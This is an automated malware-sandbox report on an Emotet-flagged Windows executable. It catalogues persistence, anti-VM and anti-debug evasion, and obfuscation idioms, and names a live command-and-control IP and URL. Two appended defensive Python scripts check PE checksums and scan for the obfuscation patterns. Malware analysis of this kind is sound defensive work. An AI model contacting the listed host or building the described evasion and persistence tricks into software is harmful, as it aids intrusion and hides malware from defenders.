Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668161072.00000000025E0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
Source: classification engine Classification label: mal80.troj.evad.winEXE@6/0@0/2
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00418C88 __EH_prolog,GetDiskFreeSpaceA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA, 0_2_00418C88
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle, 0_2_022387D0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02274CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification, 1_2_02274CB0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00412121 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow, 0_2_00412121
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02235070
Source: 2ojdmC51As.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2ojdmC51As.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\2ojdmC51As.exe 'C:\Users\user\Desktop\2ojdmC51As.exe'
Source: unknown Process created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc, 0_2_004013A4
PE file contains an invalid checksum
Source: 2ojdmC51As.exe Static PE information: real checksum: 0x69574 should be: 0x6a2b7
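The checksum mismatch reported above (stored 0x69574, expected 0x6a2b7) can be recomputed offline. The following Python is an added example and is not part of the Joe Sandbox report: it implements the PE CheckSum algorithm (the one used by imagehlp's CheckSumMappedFile and reproduced by pefile) and compares the stored OptionalHeader.CheckSum with the computed value. The 160-byte image returned by build_test_image() is a constructed stub with a deliberately wrong stored checksum, not the sample; pass a file path on the command line to check a real binary.

```python
import struct
import sys


def _checksum_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum: PE signature (4) + COFF header (20) + 64."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return pe_off + 4 + 20 + 64


def pe_checksum(data: bytes) -> int:
    """Compute the value OptionalHeader.CheckSum should hold for this file.

    Same algorithm as imagehlp's CheckSumMappedFile (and pefile's
    generate_checksum): add every 32-bit word with end-around carry, skipping
    the dword that holds the CheckSum field, fold to 16 bits, add file length.
    """
    skip = _checksum_offset(data) & ~3
    padded = data + b"\0" * (-len(data) % 4)   # summation is dword-granular
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return total + len(data)          # the real, unpadded length


def stored_checksum(data: bytes) -> int:
    """The CheckSum value currently written in the optional header."""
    return struct.unpack_from("<I", data, _checksum_offset(data))[0]


def with_checksum(data: bytes, value: int) -> bytes:
    """Copy of the image with OptionalHeader.CheckSum replaced."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, _checksum_offset(data), value & 0xFFFFFFFF)
    return bytes(buf)


def check_pe(data: bytes) -> dict:
    """Stored vs. computed value, in the same terms as the sandbox finding."""
    stored, computed = stored_checksum(data), pe_checksum(data)
    return {"stored": stored, "computed": computed, "valid": stored == computed}


def build_test_image() -> bytes:
    """Constructed 160-byte stub (not the sample, not loadable): MZ magic,
    e_lfanew -> 0x40, PE signature, zeroed headers and a bogus CheckSum."""
    buf = bytearray(160)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", buf, 0x40 + 4 + 20 + 64, 0xDEADBEEF)
    return bytes(buf)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_image()
    r = check_pe(data)
    print(f"real checksum: {r['stored']:#x} should be: {r['computed']:#x}"
          f" ({'ok' if r['valid'] else 'invalid'})")
```

A mismatch on its own is weak evidence: Windows only requires a valid checksum for kernel-mode drivers and some system DLLs, so many legitimate user-mode executables ship with a zero or stale value. What makes this finding worth noting is that the stored value is non-zero and wrong, which is what a linked file looks like after it has been modified, for example by a packer or by patching a payload into it.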
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406520 push eax; ret 0_2_0040653E
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406830 push eax; ret 0_2_0040685E
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235E10 push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02235E11
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235EA0 push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02235EA1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235EF0 push ecx; mov dword ptr [esp], 0000669Ch 0_2_02235EF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235F20 push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02235F21
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235CD0 push ecx; mov dword ptr [esp], 00001CE1h 0_2_02235CD1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D20 push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02235D21
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D00 push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02235D01
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D50 push ecx; mov dword ptr [esp], 00006847h 0_2_02235D51
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D90 push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02235D91
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235DF0 push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02235DF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235DC0 push ecx; mov dword ptr [esp], 000089FAh 0_2_02235DC1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00406520 push eax; ret 1_2_0040653E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00406830 push eax; ret 1_2_0040685E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275E10 push ecx; mov dword ptr [esp], 0000F5B3h 1_2_02275E11
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275EA0 push ecx; mov dword ptr [esp], 0000A3FDh 1_2_02275EA1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275EF0 push ecx; mov dword ptr [esp], 0000669Ch 1_2_02275EF1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275F20 push ecx; mov dword ptr [esp], 0000E36Ch 1_2_02275F21
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275CD0 push ecx; mov dword ptr [esp], 00001CE1h 1_2_02275CD1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275D20 push ecx; mov dword ptr [esp], 0000C5A1h 1_2_02275D21
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275D00 push ecx; mov dword ptr [esp], 00001F9Eh 1_2_02275D01
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275D50 push ecx; mov dword ptr [esp], 00006847h 1_2_02275D51
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275D90 push ecx; mov dword ptr [esp], 0000B2E0h 1_2_02275D91
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275DF0 push ecx; mov dword ptr [esp], 0000AAF5h 1_2_02275DF1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275DC0 push ecx; mov dword ptr [esp], 000089FAh 1_2_02275DC1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0223EA26 push ebp; iretd 1_2_0223EA28
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02227A3E push ecx; mov dword ptr [esp], 0000A3FDh 1_2_02227A3F
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02227ABE push ecx; mov dword ptr [esp], 0000E36Ch 1_2_02227ABF
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0223EA8B push edi; ret 1_2_0223EAC3
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02227A8E push ecx; mov dword ptr [esp], 0000669Ch 1_2_02227A8F

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\2ojdmC51As.exe Executable created and started: C:\Windows\SysWOW64\setupugc\sort.exe Jump to behavior
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\2ojdmC51As.exe PE file moved: C:\Windows\SysWOW64\setupugc\sort.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\2ojdmC51As.exe File opened: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0042252B IsWindowVisible,IsIconic, 0_2_0042252B
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004198B0 GetParent,GetParent,GetParent,IsIconic, 0_2_004198B0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00404F00
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0042252B IsWindowVisible,IsIconic, 1_2_0042252B
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004198B0 GetParent,GetParent,GetParent,IsIconic, 1_2_004198B0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect, 1_2_00404F00
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\2ojdmC51As.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02235070
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\2ojdmC51As.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\setupugc\sort.exe API coverage: 4.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 5820 Thread sleep time: -150000s >= -30000s Jump to behavior
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\2ojdmC51As.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004182CC FindFirstFileA,FindClose, 0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_022338F0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004182CC FindFirstFileA,FindClose, 1_2_004182CC
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 1_2_00417B29
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose, 1_2_022738F0
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: sort.exe, 00000001.00000002.932241533.0000000002A70000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\setupugc\sort.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc, 0_2_004013A4
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc, 0_2_004013A4
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02234E20 mov eax, dword ptr fs:[00000030h] 0_2_02234E20
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233F20 mov eax, dword ptr fs:[00000030h] 0_2_02233F20
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02274E20 mov eax, dword ptr fs:[00000030h] 1_2_02274E20
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02273F20 mov eax, dword ptr fs:[00000030h] 1_2_02273F20
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02225ABE mov eax, dword ptr fs:[00000030h] 1_2_02225ABE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0222095E mov eax, dword ptr fs:[00000030h] 1_2_0222095E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022269BE mov eax, dword ptr fs:[00000030h] 1_2_022269BE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02220456 mov eax, dword ptr fs:[00000030h] 1_2_02220456
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02241030 mov eax, dword ptr fs:[00000030h] 1_2_02241030
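Both idioms the report lists, the push ecx; mov dword ptr [esp], imm32 sequences under "Uses code obfuscation techniques" and the mov eax, dword ptr fs:[00000030h] loads under "Contains functionality to read the PEB", have fixed 32-bit x86 encodings, so the evidence can be reproduced with a byte-level scan of an unpacked dump. The following Python is an added example, not code from the report: it searches a code buffer for 51 C7 04 24 imm32 (which has the same effect as a plain push imm32 and is a simple equivalent-instruction substitution) and for 64 A1 30 00 00 00 (the PEB pointer load), and rewrites the substituted form back into push imm32 so that a listing or a YARA rule sees the simpler shape. The SAMPLE buffer is constructed to mirror the report's listing at 0_2_02235E10 and contains no bytes from the sample; the base address is used only for printing.

```python
import re
import sys
from collections import Counter
from typing import NamedTuple, Optional

# Fixed 32-bit x86 encodings of the two idioms the sandbox listed:
#   51 C7 04 24 imm32    push ecx ; mov dword ptr [esp], imm32  (same effect as push imm32)
#   64 A1 30 00 00 00    mov eax, dword ptr fs:[30h]            (loads the PEB pointer)
PUSH_VIA_ECX = re.compile(rb"\x51\xC7\x04\x24(.{4})", re.DOTALL)
READ_PEB = re.compile(rb"\x64\xA1\x30\x00\x00\x00")


class Hit(NamedTuple):
    address: int
    kind: str
    imm: Optional[int]   # immediate for push_via_ecx, None otherwise


def scan(code: bytes, base: int = 0) -> list:
    """Find both idioms in a code buffer; addresses are base + offset."""
    hits = []
    for m in PUSH_VIA_ECX.finditer(code):
        hits.append(Hit(base + m.start(), "push_via_ecx",
                        int.from_bytes(m.group(1), "little")))
    for m in READ_PEB.finditer(code):
        hits.append(Hit(base + m.start(), "read_peb", None))
    return sorted(hits, key=lambda h: h.address)


def normalize(code: bytes) -> bytes:
    """Rewrite 'push ecx; mov [esp], imm32' (8 bytes) as 'push imm32' plus
    three NOPs, so the buffer keeps its length and every offset stays valid."""
    return PUSH_VIA_ECX.sub(lambda m: b"\x68" + m.group(1) + b"\x90\x90\x90", code)


def summarize(hits) -> dict:
    """Count hits per idiom; a high push_via_ecx density is the obfuscation signal."""
    return dict(Counter(h.kind for h in hits))


# Constructed buffer that mirrors the report's listing at 0_2_02235E10.
# These are NOT bytes from the sample.
SAMPLE = (
    b"\x51\xC7\x04\x24\xB3\xF5\x00\x00"   # push ecx ; mov dword ptr [esp], 0F5B3h
    b"\xE8\x00\x00\x00\x00"               # call $+5 (filler)
    b"\x64\xA1\x30\x00\x00\x00"           # mov eax, dword ptr fs:[30h]
    b"\x8B\x40\x64"                       # mov eax, [eax+64h]  (PEB.NumberOfProcessors)
    b"\x51\xC7\x04\x24\xFD\xA3\x00\x00"   # push ecx ; mov dword ptr [esp], 0A3FDh
    b"\xC3"                               # ret
)
SAMPLE_BASE = 0x02235E10


def main(path: Optional[str] = None) -> None:
    code, base = (open(path, "rb").read(), 0) if path else (SAMPLE, SAMPLE_BASE)
    hits = scan(code, base)
    for h in hits:
        extra = f" imm=0x{h.imm:08X}" if h.imm is not None else ""
        print(f"{h.address:08X} {h.kind}{extra}")
    print(summarize(hits))


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it over the unpacked region rather than the packed file on disk: the 0x0223xxxx and 0x0227xxxx addresses in this report fall inside the memory ranges its Yara matches list as UNPACKEDPE. A raw byte scan can also fire on data that happens to contain these sequences, and a single fs:[30h] read is not suspicious by itself since CRT and compiler-generated code read the PEB legitimately; the density of the substituted push form across a function is the actual signal.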
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_022342F0 GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap, 0_2_022342F0
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00409C36 SetUnhandledExceptionFilter, 0_2_00409C36
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00409C48 SetUnhandledExceptionFilter, 0_2_00409C48
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00409C36 SetUnhandledExceptionFilter, 1_2_00409C36
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00409C48 SetUnhandledExceptionFilter, 1_2_00409C48
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Progman
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\setupugc\sort.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation, 0_2_00406204
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00425FF1 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 0_2_00425FF1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.2ojdmC51As.exe.2230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.sort.exe.2270000.1.unpack, type: UNPACKEDPE

Behavior Graph:

Behavior Graph ID: 319735
Sample: 2ojdmC51As.exe
Startdate: 18/11/2020
Architecture: WINDOWS
Score: 80

Sample-level signatures:
  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Found malware configuration
  Yara detected Emotet
  Machine Learning detection for sample

Process tree:
  2ojdmC51As.exe (started)
    Network: 192.168.2.1 (unknown, unknown)
    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
    Drops executables to the windows directory (C:\Windows) and starts them
    Hides that the sample has been downloaded from the Internet (zone.identifier)
    sort.exe (started by 2ojdmC51As.exe)
      Network: 200.116.145.225, port 443 (local port 49742), EPMTelecomunicacionesSAESPCO, Colombia
  svchost.exe (started, 3 instances)

Contacted Public IPs

IP: 200.116.145.225 | Domain: unknown | Country: Colombia | ASN: 13489 | ASN Name: EPMTelecomunicacionesSAESPCO | Malicious: true

Private

IP
192.168.2.1

Contacted URLs

Name: https://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/
Malicious: true
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown